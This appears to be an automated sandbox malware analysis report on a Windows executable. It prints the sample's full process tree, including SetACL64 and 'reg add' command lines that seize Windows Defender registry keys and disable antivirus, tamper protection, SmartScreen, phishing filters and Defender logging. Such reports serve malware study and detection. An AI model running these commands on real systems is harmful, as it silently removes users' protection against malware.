Edit tour

Windows Analysis Report
3Dut8dFCwD.exe

Overview

General Information

Sample name:	3Dut8dFCwD.exe renamed because original name is a hash value
Original sample name:	3f58da2e1652dddab53995166f24993f.exe
Analysis ID:	1472091
MD5:	3f58da2e1652dddab53995166f24993f
SHA1:	1721c19909c2309398d5174f9fcb2abcff51e862
SHA256:	d14ee261ed6c5dddc1900587c455991defe0f49c1da1172d7f8f1e163309d3e8
Tags:	exe
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Adds extensions / path to Windows Defender exclusion list (Registry)

Disable Microsoft Windows Malicious Software Removal Tool Heartbeat Telemetry

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Disables the Smart Screen filter

Disables the phising filter of Microsoft Edge

Machine Learning detection for dropped file

Machine Learning detection for sample

Uses cmd line tools excessively to alter registry or file data

Binary contains a suspicious time stamp

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Windows Defender Exclusions Added - Registry

Too many similar processes found

Uses 32bit PE files

Uses reg.exe to modify the Windows registry

Classification

Process Tree

System is w10x64

3Dut8dFCwD.exe (PID: 5752 cmdline: "C:\Users\user\Desktop\3Dut8dFCwD.exe" MD5: 3F58DA2E1652DDDAB53995166F24993F)

cmd.exe (PID: 5068 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\p64.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SetACL64.exe (PID: 6432 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)

SetACL64.exe (PID: 3724 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)

SetACL64.exe (PID: 5884 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)

SetACL64.exe (PID: 3172 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)

SetACL64.exe (PID: 4112 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)

SetACL64.exe (PID: 2668 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)

SetACL64.exe (PID: 6764 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)

SetACL64.exe (PID: 5008 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)

reg.exe (PID: 1868 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 4760 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 2260 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 3480 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 2436 cmdline: reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 1876 cmdline: reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 5828 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 6164 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 5276 cmdline: reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 5352 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 4128 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 1408 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 7080 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 5504 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 3176 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 6204 cmdline: reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 5084 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 4088 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 6948 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 4856 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 6644 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 3380 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 6472 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 2696 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 3724 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 3660 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 5708 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 1772 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 7060 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

reg.exe (PID: 4280 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

cleanup

Sigma Signatures

Sigma detected: Windows Defender Exclusions Added - Registry

Source: Registry Key set

Author: Christian Burkard (Nextron Systems): Data: Details: 1, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 1772, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\DisableAutoExclusions

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 3Dut8dFCwD.exe

Avira: detected

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\PowerRun64.exe	ReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\PowerRun64.exe	Virustotal: Detection: 19%			Perma Link

Multi AV Scanner detection for submitted file

Source: 3Dut8dFCwD.exe	ReversingLabs: Detection: 44%
Source: 3Dut8dFCwD.exe	Virustotal: Detection: 45%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\cabweejcuqvpws.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 3Dut8dFCwD.exe

Joe Sandbox ML: detected

Source: 3Dut8dFCwD.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 3Dut8dFCwD.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdbG source: SetACL64.exe, 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2067201156.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000000.2069740912.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000002.2070784013.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000000.2071297477.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000002.2072969923.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2073515218.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2074479225.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2077480950.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2075003678.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2080342564.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2079502017.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2080706162.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2081680531.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2082080355.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2083243826.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr
Source:	Binary string: D:\Projects\New\win_version_csharp\obj\Release\win_version_csharp.pdb source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, win_version_csharp.exe.0.dr
Source:	Binary string: D:\Projects\ConsoleApplication9\ConsoleApplication9\obj\Release\ConsoleApplication9.pdb source: cabweejcuqvpws.exe.0.dr
Source:	Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: SetACL64.exe, 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2067201156.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000000.2069740912.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000002.2070784013.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000000.2071297477.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000002.2072969923.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2073515218.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2074479225.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2077480950.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2075003678.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2080342564.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2079502017.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2080706162.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2081680531.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2082080355.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2083243826.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr

Change of critical system settings

Adds extensions / path to Windows Defender exclusion list (Registry)

Source: C:\Windows\SysWOW64\reg.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions DisableAutoExclusions

Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Code function: 0_2_00405C40 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C40
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Code function: 0_2_00406891 FindFirstFileW,FindClose,	0_2_00406891
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69708C76C _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,	4_2_00007FF69708C76C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF6970596D0 FindFirstFileW,GetLastError,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	4_2_00007FF6970596D0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69706CF15 MoveFileExW,FindFirstFileW,GetLastError,FindNextFileW,DeleteFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	4_2_00007FF69706CF15
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69708C76C _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,	5_2_00007FF69708C76C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF6970596D0 FindFirstFileW,GetLastError,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	5_2_00007FF6970596D0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69706CF15 MoveFileExW,FindFirstFileW,GetLastError,FindNextFileW,DeleteFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	5_2_00007FF69706CF15

Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: PowerRun64.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: PowerRun64.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: PowerRun64.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 3Dut8dFCwD.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: PowerRun64.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: PowerRun64.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: PowerRun64.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: PowerRun64.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: SetACL64.exe, SetACL64.exe, 00000005.00000000.2069740912.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000002.2070784013.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000000.2071297477.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000002.2072969923.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2073515218.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2074479225.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2077480950.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2075003678.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2080342564.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2079502017.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2080706162.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2081680531.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2082080355.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2083243826.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr	String found in binary or memory: https://helgeklein.com
Source: SetACL64.exe, SetACL64.exe, 00000005.00000000.2069740912.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000002.2070784013.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000000.2071297477.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000002.2072969923.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2073515218.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2074479225.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2077480950.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2075003678.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2080342564.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2079502017.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2080706162.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2081680531.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2082080355.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2083243826.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr	String found in binary or memory: https://helgeklein.com.
Source: SetACL64.exe, SetACL64.exe, 00000005.00000000.2069740912.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000002.2070784013.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000000.2071297477.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000002.2072969923.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2073515218.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2074479225.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2077480950.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2075003678.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2080342564.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2079502017.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2080706162.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2081680531.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2082080355.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2083243826.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr	String found in binary or memory: https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: PowerRun64.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: C:\Users\user\Desktop\3Dut8dFCwD.exe

